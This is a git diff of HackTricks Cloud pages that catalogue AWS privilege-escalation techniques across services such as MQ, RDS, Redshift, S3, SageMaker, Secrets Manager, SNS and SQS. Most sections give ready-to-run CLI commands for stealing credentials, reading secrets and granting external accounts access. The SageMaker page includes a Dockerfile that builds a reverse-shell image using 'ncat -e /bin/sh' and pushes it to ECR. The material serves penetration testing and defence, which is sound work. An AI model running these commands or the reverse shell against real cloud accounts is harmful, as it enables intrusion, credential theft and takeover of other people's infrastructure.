overflow="wrap" %} ```bash aws set-resource-access-for-bucket \ --resource-name \ --bucket-name \ --access allow ``` -{% endcode %} **Potential Impact:** Potential new access to buckets with sensitive information. @@ -179,17 +159,4 @@ aws lightsail update-domain-entry \ **Potential Impact:** Takeover a domain -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md new file mode 100644 index 000000000..5cf41b391 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mediapackage-privesc.md @@ -0,0 +1,25 @@ +# AWS - Mediapackage Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +### `mediapackage:RotateChannelCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +```bash +aws mediapackage rotate-channel-credentials --id +``` + +### `mediapackage:RotateIngestEndpointCredentials` + +Changes the Channel's first IngestEndpoint's username and password. (This API is deprecated for RotateIngestEndpointCredentials) + +```bash +aws mediapackage rotate-ingest-endpoint-credentials --id test --ingest-endpoint-id 584797f1740548c389a273585dd22a63 +``` + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md new file mode 100644 index 000000000..29aefa731 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-mq-privesc.md @@ -0,0 +1,49 @@ +# AWS - MQ Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## MQ + +For more information about MQ check: + +{{#ref}} +../aws-services/aws-mq-enum.md +{{#endref}} + +### `mq:ListBrokers`, `mq:CreateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +```bash +aws mq list-brokers +aws mq create-user --broker-id --console-access --password --username +``` + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:ListUsers`, `mq:UpdateUser` + +With those permissions you can **create a new user in an ActimeMQ broker** (this doesn't work in RabbitMQ): + +```bash +aws mq list-brokers +aws mq list-users --broker-id +aws mq update-user --broker-id --console-access --password --username +``` + +**Potential Impact:** Access sensitive info navigating through ActiveMQ + +### `mq:ListBrokers`, `mq:UpdateBroker` + +If a broker is using **LDAP** for authorization with **ActiveMQ**. It's possible to **change** the **configuration** of the LDAP server used to **one controlled by the attacker**. This way the attacker will be able to **steal all the credentials being sent through LDAP**. + +```bash +aws mq list-brokers +aws mq update-broker --broker-id --ldap-server-metadata=... +``` + +If you could somehow find the original credentials used by ActiveMQ you could perform a MitM, steal the creds, used them in the original server, and send the response (maybe just reusing the crendetials stolen you could do this). + +**Potential Impact:** Steal ActiveMQ credentials + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md new file mode 100644 index 000000000..1ca4c4e60 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-msk-privesc.md @@ -0,0 +1,24 @@ +# AWS - MSK Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## MSK + +For more information about MSK (Kafka) check: + +{{#ref}} +../aws-services/aws-msk-enum.md +{{#endref}} + +### `msk:ListClusters`, `msk:UpdateSecurity` + +With these **privileges** and **access to the VPC where the kafka brokers are**, you could add the **None authentication** to access them. + +```bash +aws msk --client-authentication --cluster-arn --current-version +``` + +You need access to the VPC because **you cannot enable None authentication with Kafka publicly** exposed. If it's publicly exposed, if **SASL/SCRAM** authentication is used, you could **read the secret** to access (you will need additional privileges to read the secret).\ +If **IAM role-based authentication** is used and **kafka is publicly exposed** you could still abuse these privileges to give you permissions to access it. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md new file mode 100644 index 000000000..9da7808e3 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-organizations-prinvesc.md @@ -0,0 +1,18 @@ +# AWS - Organizations Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Organizations + +For more information check: + +{{#ref}} +../aws-services/aws-organizations-enum.md +{{#endref}} + +## From management Account to children accounts + +If you compromise the root/management account, chances are you can compromise all the children accounts.\ +To [**learn how check this page**](../#compromising-the-organization). + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md similarity index 59% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md index 081a74574..6e8d1b809 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-rds-privesc.md @@ -1,27 +1,14 @@ # AWS - RDS Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## RDS - Relational Database Service For more information about RDS check: -{% content-ref url="../aws-services/aws-relational-database-rds-enum.md" %} -[aws-relational-database-rds-enum.md](../aws-services/aws-relational-database-rds-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-services/aws-relational-database-rds-enum.md +{{#endref}} ### `rds:ModifyDBInstance` @@ -41,9 +28,8 @@ aws rds modify-db-instance \ psql postgresql://:@:5432/ ``` -{% hint style="warning" %} -You will need to be able to **contact to the database** (they are usually only accessible from inside networks). -{% endhint %} +> [!WARNING] +> You will need to be able to **contact to the database** (they are usually only accessible from inside networks). **Potential Impact:** Find sensitive info inside the databases. @@ -55,9 +41,8 @@ According to the [**docs**](https://docs.aws.amazon.com/AmazonRDS/latest/UserGui #### Postgresql (Aurora) -{% hint style="success" %} -If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. -{% endhint %} +> [!TIP] +> If running **`SELECT datname FROM pg_database;`** you find a database called **`rdsadmin`** you know you are inside an **AWS postgresql database**. First you can check if this database has been used to access any other AWS service. You could check this looking at the installed extensions: @@ -97,20 +82,18 @@ If you had **raw AWS credentials** you could also use them to access S3 data wit ```sql SELECT aws_s3.table_import_from_s3( 't', '', '(format csv)', - :'s3_uri', + :'s3_uri', aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '') ); ``` -{% hint style="info" %} -Postgresql **doesn't need to change any parameter group variable** to be able to access S3. -{% endhint %} +> [!NOTE] +> Postgresql **doesn't need to change any parameter group variable** to be able to access S3. #### Mysql (Aurora) -{% hint style="success" %} -Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. -{% endhint %} +> [!TIP] +> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**. Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data. @@ -152,25 +135,21 @@ aws --region eu-west-1 --profile none-priv rds create-db-instance \ ### `rds:CreateDBInstance`, `iam:PassRole` -{% hint style="info" %} -TODO: Test -{% endhint %} +> [!NOTE] +> TODO: Test An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance. -{% hint style="warning" %} -Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): +> [!WARNING] +> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)): -* The profile must exist in your account. -* The profile must have an IAM role that Amazon EC2 has permissions to assume. -* The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . -{% endhint %} +> - The profile must exist in your account. +> - The profile must have an IAM role that Amazon EC2 has permissions to assume. +> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` . -{% code overflow="wrap" %} ```bash aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole ``` -{% endcode %} **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. @@ -178,29 +157,13 @@ aws rds create-db-instance --db-instance-identifier malicious-instance --db-inst An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance. -{% hint style="warning" %} -The DB instance must be outside of a cluster for this -{% endhint %} +> [!WARNING] +> The DB instance must be outside of a cluster for this -{% code overflow="wrap" %} ```bash aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name ``` -{% endcode %} **Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance. -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md new file mode 100644 index 000000000..810cdf3ff --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md @@ -0,0 +1,107 @@ +# AWS - Redshift Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Redshift + +For more information about RDS check: + +{{#ref}} +../aws-services/aws-redshift-enum.md +{{#endref}} + +### `redshift:DescribeClusters`, `redshift:GetClusterCredentials` + +With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it: + +```bash +# Get creds +aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1 +# Connect, even if the password is a base64 string, that is the password +psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439 +``` + +**Potential Impact:** Find sensitive info inside the databases. + +### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM` + +With these permissions you can get **info of all the clusters** and **get credentials** to access it.\ +Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has. + +```bash +# Get creds +aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1 +# Connect, even if the password is a base64 string, that is the password +psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439 +``` + +**Potential Impact:** Find sensitive info inside the databases. + +### `redshift:DescribeClusters`, `redshift:ModifyCluster?` + +It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet): + +``` +aws redshift modify-cluster –cluster-identifier –master-user-password ‘master-password’; +``` + +**Potential Impact:** Find sensitive info inside the databases. + +## Accessing External Services + +> [!WARNING] +> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned. + +> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';` + +### Lambdas + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like: + +```sql +CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT) +RETURNS INT +STABLE +LAMBDA 'lambda_function' +IAM_ROLE default; +``` + +### S3 + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**: + +```sql +# Read +copy table from 's3:///load/key_prefix' +credentials 'aws_iam_role=arn:aws:iam:::role/' +region '' +options; + +# Write +unload ('select * from venue') +to 's3://mybucket/tickit/unload/venue_' +iam_role default; +``` + +### Dynamo + +As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**: + +```sql +copy favoritemovies +from 'dynamodb://ProductCatalog' +iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole'; +``` + +> [!WARNING] +> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located. + +### EMR + +Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html) + +## References + +- [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a) + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md similarity index 63% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md index 8850b9b14..a85a7f764 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md @@ -1,19 +1,6 @@ # AWS - S3 Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## S3 @@ -25,30 +12,33 @@ For example, an attacker with those **permissions over a cloudformation bucket** ```json { - "Version":"2012-10-17", - "Statement":[ - { - "Effect":"Allow", - "Action":[ - "s3:PutBucketNotification", - "s3:GetBucketNotification", - "s3:PutObject", - "s3:GetObject"], - "Resource":[ - "arn:aws:s3:::cf-templates-*\/*", - "arn:aws:s3:::cf-templates-*"] - }, - { - "Effect":"Allow", - "Action":"s3:ListAllMyBuckets", - "Resource":"*" - }] + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Action": [ + "s3:PutBucketNotification", + "s3:GetBucketNotification", + "s3:PutObject", + "s3:GetObject" + ], + "Resource": [ + "arn:aws:s3:::cf-templates-*/*", + "arn:aws:s3:::cf-templates-*" + ] + }, + { + "Effect": "Allow", + "Action": "s3:ListAllMyBuckets", + "Resource": "*" } + ] +} ``` And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**. -![](<../../../.gitbook/assets/image (174).png>) +![](<../../../images/image (174).png>) The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\ For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/) @@ -60,7 +50,7 @@ An attacker with **read access** to them might find **sensitive information** on An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\ These are some examples: -* If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. +- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**. ### `s3:PutBucketPolicy` @@ -158,7 +148,7 @@ An attacker could abuse these permissions to grant him more access over specific ```bash # Update bucket object ACL -aws s3api get-object-acl --bucket --key flag +aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --access-control-policy file://objacl.json ##JSON ACL example @@ -190,17 +180,4 @@ aws s3api get-object-acl --bucket --key flag aws s3api put-object-acl --bucket --key flag --version-id --access-control-policy file://objacl.json ``` -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md similarity index 54% rename from pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md rename to src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md index b795ce1ff..e3c1f92b7 100644 --- a/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md @@ -2,20 +2,7 @@ ## AWS - Sagemaker Privesc -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl` @@ -72,32 +59,31 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the c An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role. -{% hint style="warning" %} -This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). - -```bash -# Create docker image -mkdir /tmp/rev -## Note that the trainning job is going to call an executable called "train" -## That's why I'm putting the rev shell in /bin/train -## Set the values of and -cat > /tmp/rev/Dockerfile < -e /bin/sh' > /bin/train -RUN chmod +x /bin/train -CMD ncat -e /bin/sh -EOF - -cd /tmp/rev -sudo docker build . -t reverseshell - -# Upload it to ECR -sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ -sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest -sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest -``` -{% endhint %} +> [!WARNING] +> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job). +> +> ```bash +> # Create docker image +> mkdir /tmp/rev +> ## Note that the trainning job is going to call an executable called "train" +> ## That's why I'm putting the rev shell in /bin/train +> ## Set the values of and +> cat > /tmp/rev/Dockerfile < FROM ubuntu +> RUN apt update && apt install -y ncat curl +> RUN printf '#!/bin/bash\nncat -e /bin/sh' > /bin/train +> RUN chmod +x /bin/train +> CMD ncat -e /bin/sh +> EOF +> +> cd /tmp/rev +> sudo docker build . -t reverseshell +> +> # Upload it to ECR +> sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/ +> sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest +> sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest +> ``` ```bash # Create trainning job with the docker image created @@ -123,19 +109,6 @@ An attacker with those permissions will (potentially) be able to create an **hyp ## References -* [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) +- [https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/](https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation-part-2/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md new file mode 100644 index 000000000..efd911f80 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-secrets-manager-privesc.md @@ -0,0 +1,51 @@ +# AWS - Secrets Manager Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## Secrets Manager + +For more info about secrets manager check: + +{{#ref}} +../aws-services/aws-secrets-manager-enum.md +{{#endref}} + +### `secretsmanager:GetSecretValue` + +An attacker with this permission can get the **saved value inside a secret** in AWS **Secretsmanager**. + +```bash +aws secretsmanager get-secret-value --secret-id # Get value +``` + +**Potential Impact:** Access high sensitive data inside AWS secrets manager service. + +### `secretsmanager:GetResourcePolicy`, `secretsmanager:PutResourcePolicy`, (`secretsmanager:ListSecrets`) + +With the previous permissions it's possible to **give access to other principals/accounts (even external)** to access the **secret**. Note that in order to **read secrets encrypted** with a KMS key, the user also needs to have **access over the KMS key** (more info in the [KMS Enum page](../aws-services/aws-kms-enum.md)). + +```bash +aws secretsmanager list-secrets +aws secretsmanager get-resource-policy --secret-id +aws secretsmanager put-resource-policy --secret-id --resource-policy file:///tmp/policy.json +``` + +policy.json: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam:::root" + }, + "Action": "secretsmanager:GetSecretValue", + "Resource": "*" + } + ] +} +``` + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md new file mode 100644 index 000000000..9475d238a --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sns-privesc.md @@ -0,0 +1,43 @@ +# AWS - SNS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## SNS + +For more information check: + +{{#ref}} +../aws-services/aws-sns-enum.md +{{#endref}} + +### `sns:Publish` + +An attacker could send malicious or unwanted messages to the SNS topic, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sns publish --topic-arn --message +``` + +**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. + +### `sns:Subscribe` + +An attacker could subscribe or to an SNS topic, potentially gaining unauthorized access to messages or disrupting the normal functioning of applications relying on the topic. + +```bash +aws sns subscribe --topic-arn --protocol --endpoint +``` + +**Potential Impact**: Unauthorized access to messages (sensitve info), service disruption for applications relying on the affected topic. + +### `sns:AddPermission` + +An attacker could grant unauthorized users or services access to an SNS topic, potentially getting further permissions. + +```css +aws sns add-permission --topic-arn --label --aws-account-id --action-name +``` + +**Potential Impact**: Unauthorized access to the topic, message exposure, or topic manipulation by unauthorized users or services, disruption of normal functioning for applications relying on the topic. + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md new file mode 100644 index 000000000..80f14a667 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sqs-privesc.md @@ -0,0 +1,46 @@ +# AWS - SQS Privesc + +{{#include ../../../banners/hacktricks-training.md}} + +## SQS + +For more information check: + +{{#ref}} +../aws-services/aws-sqs-and-sns-enum.md +{{#endref}} + +### `sqs:AddPermission` + +An attacker could use this permission to grant unauthorized users or services access to an SQS queue by creating new policies or modifying existing policies. This could result in unauthorized access to the messages in the queue or manipulation of the queue by unauthorized entities. + +```bash +cssCopy codeaws sqs add-permission --queue-url --actions --aws-account-ids --label +``` + +**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. + +### `sqs:SendMessage` , `sqs:SendMessageBatch` + +An attacker could send malicious or unwanted messages to the SQS queue, potentially causing data corruption, triggering unintended actions, or exhausting resources. + +```bash +aws sqs send-message --queue-url --message-body +aws sqs send-message-batch --queue-url --entries +``` + +**Potential Impact**: Vulnerability exploitation, Data corruption, unintended actions, or resource exhaustion. + +### `sqs:ReceiveMessage`, `sqs:DeleteMessage`, `sqs:ChangeMessageVisibility` + +An attacker could receive, delete, or modify the visibility of messages in 